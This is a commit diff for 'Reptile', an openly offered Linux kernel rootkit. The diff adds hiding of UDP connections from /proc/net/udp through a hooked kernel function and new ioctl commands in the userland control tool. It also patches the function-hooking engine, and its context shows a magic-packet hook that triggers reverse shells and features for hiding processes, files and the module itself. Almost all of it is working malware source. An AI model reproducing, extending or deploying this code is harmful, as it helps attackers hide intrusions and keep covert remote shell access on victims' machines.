fixing KHOOK and add UDP hide feature

CKLinuxProject · Feb 1, 2019 · 165b539 · 165b539
1 parent 4cbf898
commit 165b539
Show file tree

Hide file tree

Showing 6 changed files with 154 additions and 42 deletions.
diff --git a/Makefile b/Makefile
@@ -6,4 +6,6 @@ all:
 clean:
  cd sbin && make clean
  $(MAKE) -C /lib/modules/$(shell uname -r)/build M=$$PWD clean
- cd parasite_loader && make clean
+ cd parasite_loader && make clean
+ rm -rf config.h
+
diff --git a/README.md b/README.md
@@ -1,4 +1,4 @@
-# Reptile 2.0
+# Reptile
 
 <img align="left" src="https://imgur.com/nqujOlz.png">
 
@@ -19,7 +19,7 @@
 - Hide files and directories
 - Hide processes
 - Hide himself
-- Hide TCP/IP connections
+- Hide TCP/UDP connections
 - Hidden boot persistence
 - File content tampering
 - Some obfuscation techniques
@@ -29,7 +29,6 @@
 - Shell connect back each X times (not default)
 
 ## Install
-~perl -MCPAN -e "install String::Unescape"~ `no need to install this perl module anymore`
 ```
 apt-get install linux-headers-$(uname -r)
 git clone https://github.com/f0rb1dd3n/Reptile.git
@@ -67,7 +66,6 @@ Special thanks to my friend [Ilya V. Matveychikov](https://github.com/milabs) fo
 
 If you wanna more information, send me an e-mail: [email protected]
 
-<br>
 <p align="center">
  <img src="http://2.bp.blogspot.com/-OMozG1JNxic/VQxKMfiU2EI/AAAAAAAAOQM/_suBsIa9O7c/s1600/Reptile%2B6.gif">
 </p>
diff --git a/khook/engine.c b/khook/engine.c
@@ -70,10 +70,18 @@ static void __khook_init(khook_t *s)
 
  while (s->length < 5) {
  struct insn insn;
-#if LINUX_VERSION_CODE >= KERNEL_VERSION(3, 19, 0)
+#ifdef RHEL_RELEASE_CODE
+ #if RHEL_RELEASE_CODE >= RHEL_RELEASE_VERSION(7, 0)
  insn_api.init(&insn, s->target + s->length, MAX_INSN_SIZE, x86_64);
-#else
+ #else
  insn_api.init(&insn, s->target + s->length, x86_64);
+ #endif
+#else 
+ #if LINUX_VERSION_CODE >= KERNEL_VERSION(3, 19, 0)
+ insn_api.init(&insn, s->target + s->length, MAX_INSN_SIZE, x86_64);
+ #else
+ insn_api.init(&insn, s->target + s->length, x86_64);
+ #endif
 #endif
  insn_api.get_length(&insn);
  s->length += insn.length;

diff --git a/rep_mod.c b/rep_mod.c
@@ -90,6 +90,7 @@ struct hidden_conn {
 };
 
 LIST_HEAD(hidden_tcp_conn);
+LIST_HEAD(hidden_udp_conn);
 
 void hide(void)
 {
@@ -179,20 +180,23 @@ int is_invisible(pid_t pid)
 
  if (!pid)
  return ret;
+
  task = find_task(pid);
  if (!task)
  return ret;
+
  if (task->flags & FLAG)
  ret = 1;
+
  put_task_struct(task);
  return ret;
 }
 
-void exec(char **argv)
+int exec(char **argv)
 {
  char *path = PATH;
  char *envp[] = {path, NULL};
- call_usermodehelper(argv[0], argv, envp, UMH_WAIT_PROC);
+ return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
 }
 
 void shell_execer(struct work_struct *work)
@@ -350,8 +354,7 @@ char **parse(char *line)
  if (position >= bufsize) {
  bufsize += TOK_BUFSIZE;
  tokens_backup = tokens;
- tokens = krealloc(tokens, bufsize * sizeof(char *),
- GFP_KERNEL);
+ tokens = krealloc(tokens, bufsize * sizeof(char *), GFP_KERNEL);
  if (!tokens) {
  kfree(tokens_backup);
  return NULL;
@@ -386,10 +389,10 @@ void _sub(char *arg, int key, int nbytes)
 }
 
 unsigned int magic_packet_hook(const struct nf_hook_ops *ops,
- struct sk_buff *socket_buffer,
- const struct net_device *in,
-   const struct net_device *out,
-   int (*okfn)(struct sk_buff *))
+   struct sk_buff *socket_buffer,
+   const struct net_device *in,
+   const struct net_device *out,
+   int (*okfn)(struct sk_buff *))
 {
  const struct iphdr *ip_header;
  const struct icmphdr *icmp_header;
@@ -434,8 +437,7 @@ unsigned int magic_packet_hook(const struct nf_hook_ops *ops,
 
  if (//htons(tcp_header->seq) == SEQ && /* uncoment this if you wanna use tcp_header->seq as filter */
  htons(tcp_header->window) == WIN) {
- size = htons(ip_header->tot_len) - sizeof(_iph) -
- sizeof(_tcph);
+ size = htons(ip_header->tot_len) - sizeof(_iph) - sizeof(_tcph);
 
  _data = kmalloc(size, GFP_KERNEL);
 
@@ -450,9 +452,8 @@ unsigned int magic_packet_hook(const struct nf_hook_ops *ops,
  }
 
  data = skb_header_pointer(socket_buffer,
- ip_header->ihl * 4 +
- sizeof(struct tcphdr),
- size, &_data);
+ ip_header->ihl * 4 + sizeof(struct tcphdr),
+ size, &_data);
 
  if (!data) {
  kfree(_data);
@@ -471,8 +472,7 @@ unsigned int magic_packet_hook(const struct nf_hook_ops *ops,
  args = parse(string);
 
  if (args) {
- shell_exec_queue(SHELL, args[1],
- args[2], PASS);
+ shell_exec_queue(SHELL, args[1], args[2], PASS);
  kfree(args);
  }
 
@@ -500,8 +500,7 @@ unsigned int magic_packet_hook(const struct nf_hook_ops *ops,
  if (htons(icmp_header->un.echo.sequence) == SEQ &&
  htons(icmp_header->un.echo.id) == WIN) {
 
- size = htons(ip_header->tot_len) - sizeof(_iph) -
- sizeof(_icmph);
+ size = htons(ip_header->tot_len) - sizeof(_iph) - sizeof(_icmph);
 
  _data = kmalloc(size, GFP_KERNEL);
 
@@ -516,9 +515,8 @@ unsigned int magic_packet_hook(const struct nf_hook_ops *ops,
  }
 
  data = skb_header_pointer(socket_buffer,
- ip_header->ihl * 4 +
- sizeof(struct icmphdr),
- size, &_data);
+ ip_header->ihl * 4 + sizeof(struct icmphdr),
+ size, &_data);
 
  if (!data) {
  kfree(_data);
@@ -537,9 +535,7 @@ unsigned int magic_packet_hook(const struct nf_hook_ops *ops,
  args = parse(string);
 
  if (args) {
- shell_exec_queue(SHELL, args[1],
- args[2], PASS);
-
+ shell_exec_queue(SHELL, args[1], args[2], PASS);
  kfree(args);
  }
 
@@ -567,8 +563,7 @@ unsigned int magic_packet_hook(const struct nf_hook_ops *ops,
  if (htons(udp_header->len) <=
  (sizeof(struct udphdr) + strlen(TOKEN) + 25)) {
 
- size = htons(ip_header->tot_len) - sizeof(_iph) -
- sizeof(_udph);
+ size = htons(ip_header->tot_len) - sizeof(_iph) - sizeof(_udph);
 
  _data = kmalloc(size, GFP_KERNEL);
 
@@ -583,9 +578,8 @@ unsigned int magic_packet_hook(const struct nf_hook_ops *ops,
  }
 
  data = skb_header_pointer(socket_buffer,
- ip_header->ihl * 4 +
- sizeof(struct udphdr),
- size, &_data);
+ ip_header->ihl * 4 + sizeof(struct udphdr),
+ size, &_data);
 
  if (!data) {
  kfree(_data);
@@ -604,9 +598,7 @@ unsigned int magic_packet_hook(const struct nf_hook_ops *ops,
  args = parse(string);
 
  if (args) {
- shell_exec_queue(SHELL, args[1],
- args[2], PASS);
-
+ shell_exec_queue(SHELL, args[1], args[2], PASS);
  kfree(args);
  }
 
@@ -846,6 +838,34 @@ static int khook_inet_ioctl(struct socket *sock, unsigned int cmd,
  }
  }
  break;
+ case 6:
+ if (copy_from_user(&addr, args.argv, sizeof(struct sockaddr_in)))
+ goto out;
+
+ hc = kmalloc(sizeof(*hc), GFP_KERNEL);
+
+ if (!hc)
+ goto out;
+
+ hc->addr = addr;
+
+ list_add(&hc->list, &hidden_udp_conn);
+ break;
+ case 7:
+ if (copy_from_user(&addr, args.argv, sizeof(struct sockaddr_in)))
+ goto out;
+
+ list_for_each_entry(hc, &hidden_udp_conn, list)
+ {
+ if (addr.sin_port == hc->addr.sin_port &&
+ addr.sin_addr.s_addr ==
+ hc->addr.sin_addr.s_addr) {
+ list_del(&hc->list);
+ kfree(hc);
+ break;
+ }
+ }
+ break;
  default:
  goto origin;
  }
@@ -901,6 +921,47 @@ static int khook_tcp4_seq_show(struct seq_file *seq, void *v)
  return ret;
 }
 
+KHOOK_EXT(int, udp4_seq_show, struct seq_file *, void *);
+static int khook_udp4_seq_show(struct seq_file *seq, void *v)
+{
+ int ret;
+ struct sock *sk = v;
+ struct inet_sock *inet;
+ struct hidden_conn *hc;
+ unsigned short dport;
+ unsigned int daddr;
+
+ KHOOK_GET(udp4_seq_show);
+
+ if (v == SEQ_START_TOKEN) {
+ goto origin;
+ }
+
+ inet = (struct inet_sock *)sk;
+
+#if LINUX_VERSION_CODE >= KERNEL_VERSION(2, 6, 33)
+ dport = inet->inet_dport;
+ daddr = inet->inet_daddr;
+#else
+ dport = inet->dport;
+ daddr = inet->daddr;
+#endif
+
+ list_for_each_entry(hc, &hidden_udp_conn, list)
+ {
+ if ( //hc->addr.sin_port == dport &&
+ hc->addr.sin_addr.s_addr == daddr) {
+ ret = 0;
+ goto out;
+ }
+ }
+origin:
+ ret = KHOOK_ORIGIN(udp4_seq_show, seq, v);
+out:
+ KHOOK_PUT(udp4_seq_show);
+ return ret;
+}
+
 KHOOK_EXT(int, load_elf_binary, struct linux_binprm *);
 static int khook_load_elf_binary(struct linux_binprm *bprm)
 {
@@ -978,6 +1039,11 @@ static int __init reptile_init(void)
 
  work_queue = create_workqueue(WORKQUEUE);
 
+ ret = khook_init();
+
+ if (ret != 0)
+ goto out;
+
  magic_packet_hook_options.hook = (void *)magic_packet_hook;
  magic_packet_hook_options.hooknum = 0;
  magic_packet_hook_options.pf = PF_INET;
@@ -988,10 +1054,11 @@ static int __init reptile_init(void)
 #else
  nf_register_hook(&magic_packet_hook_options);
 #endif
- ret = khook_init();
+
  exec(argv);
  hide();
 
+out:
  return ret;
 }
 

diff --git a/sbin/cmd.c b/sbin/cmd.c
@@ -106,7 +106,7 @@ int main(int argc, char **argv)
  }
  }
 
- if (strcmp(argv[1], "conn") == 0) {
+ if (strcmp(argv[1], "tcp") == 0) {
  if (argc < 4)
  goto fail;
 
@@ -141,6 +141,41 @@ int main(int argc, char **argv)
  }
  }
 
+ if (strcmp(argv[1], "udp") == 0) {
+ if (argc < 4)
+ goto fail;
+
+ if (strcmp(argv[4], "hide") == 0) {
+ args.cmd = 6;
+ } else if (strcmp(argv[4], "show") == 0) {
+ args.cmd = 7;
+ } else {
+ goto fail;
+ }
+
+ host = gethostbyname(argv[2]);
+
+ if (host == NULL)
+ goto fail;
+
+ memcpy((void *)&addr.sin_addr, (void *)host->h_addr,
+ host->h_length);
+
+ addr.sin_family = AF_INET;
+ addr.sin_port = htons(atoi(argv[3]));
+
+ args.argv = &addr;
+
+ if (ioctl(sockfd, AUTH, HTUA) == 0) {
+ if (ioctl(sockfd, AUTH, &args) == 0) {
+ if (ioctl(sockfd, AUTH, HTUA) == 0) {
+ printf("\e[01;32mSuccess!\e[00m\n");
+ goto out;
+ }
+ }
+ }
+ }
+
 fail:
  printf("\e[01;31mFailed!\e[00m\n");
 out: